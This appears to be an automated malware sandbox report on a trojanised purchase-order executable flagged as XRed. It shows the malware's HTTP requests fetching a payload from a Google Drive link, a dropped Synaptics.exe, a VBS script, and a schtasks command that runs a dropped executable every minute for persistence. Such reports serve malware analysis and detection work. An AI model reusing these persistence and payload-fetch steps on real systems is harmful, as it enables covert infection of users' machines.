                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.4 | 50092 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:21:44 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
2024-12-24 17:21:45 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6IUec-h0_uXlTdOm2ngmUhFNFSlJHTMtBegcESr43wOLrnaTa-j2C3NDzxHoPkB6ra4_RXZ_w
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:45 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-9FLXBR3QXg26etNw40Jj-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:45 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:45 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="vgd0EyUIfo-03w_IjDWdCQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:45 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                82 | 192.168.2.4 | 50110 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:48 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:49 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:48 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-e1-y742f9JDfai9kPuWmUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                83 | 192.168.2.4 | 50111 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:48 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:49 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:48 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-bAmiUw9OFzd7_zea-0F6sQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                84 | 192.168.2.4 | 50119 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:51 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:52 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC7bMQOL0YxAf0kkPrbWS1eD2JOIBEY66VWeJU5R6ZQq8UZqSvjSugrY89VVeJy0fo3bSt_jTno
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:51 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-6c8jDejuWJtJwaQxV57AQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:52 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:52 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="eafxxhilL-czH66thmNsPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:52 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                85 | 192.168.2.4 | 50120 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:51 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:52 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC5WLpgcBNDUfLrJRL8_akqodRuvQj1STTWbdNnH6J5dVc9Pk-uYLJvNYCegNswaeiMvN7Yc464
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:51 GMT
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-EaBuMDb-tlbLnYyLo76xjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:52 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:52 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="H4qYoOdWkqySFtEkxscarw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:52 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID:86
Source IP:192.168.2.4
Source Port:50117
Destination IP:142.250.181.14
Destination Port:443
PID:4076
Process:C:\ProgramData\Synaptics\Synaptics.exe
Timestamp:2024-12-24 17:21:51 UTC
Bytes transferred:344
Direction:OUT
Data:
GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
Timestamp:2024-12-24 17:21:51 UTC
Bytes transferred:1314
Direction:IN
Data:
HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:51 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-yNHKDD1mUwF3uoQCn81c9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID:87
Source IP:192.168.2.4
Source Port:50118
Destination IP:142.250.181.14
Destination Port:443
PID:4076
Process:C:\ProgramData\Synaptics\Synaptics.exe
Timestamp:2024-12-24 17:21:51 UTC
Bytes transferred:344
Direction:OUT
Data:
GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
Timestamp:2024-12-24 17:21:51 UTC
Bytes transferred:1314
Direction:IN
Data:
HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:51 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-u7kvVlqF7wHt5wHTzZHV-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close



                                                                                                                                Target ID:0
                                                                                                                                Start time:12:19:59
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:1'684'992 bytes
                                                                                                                                MD5 hash:17FB4F9DF5175E684A3427C5997B2007
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:1
                                                                                                                                Start time:12:19:59
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe"
                                                                                                                                Imagebase:0xea0000
                                                                                                                                File size:913'408 bytes
                                                                                                                                MD5 hash:7E05F5F77F8A0F63634CD734AE52CE55
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000001.00000002.4549568281.000000000411C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 50%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                Target ID:2
                                                                                                                                Start time:12:20:00
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:771'584 bytes
                                                                                                                                MD5 hash:B30E717CDE0FA4A5DE907A7148308430
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:12:20:00
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                Imagebase:0xc40000
                                                                                                                                File size:53'161'064 bytes
                                                                                                                                MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:4
                                                                                                                                Start time:12:20:01
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                                                                                                                Imagebase:0x240000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:5
                                                                                                                                Start time:12:20:01
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:6
                                                                                                                                Start time:12:20:02
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs
                                                                                                                                Imagebase:0xfa0000
                                                                                                                                File size:147'456 bytes
                                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.4540189896.0000000003430000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000006.00000002.4538842367.0000000003158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                Target ID:7
                                                                                                                                Start time:12:20:02
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                                                                                                                Imagebase:0xcd0000
                                                                                                                                File size:187'904 bytes
                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:9
                                                                                                                                Start time:12:20:04
                                                                                                                                Start date:24/12/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                Imagebase:0x70000
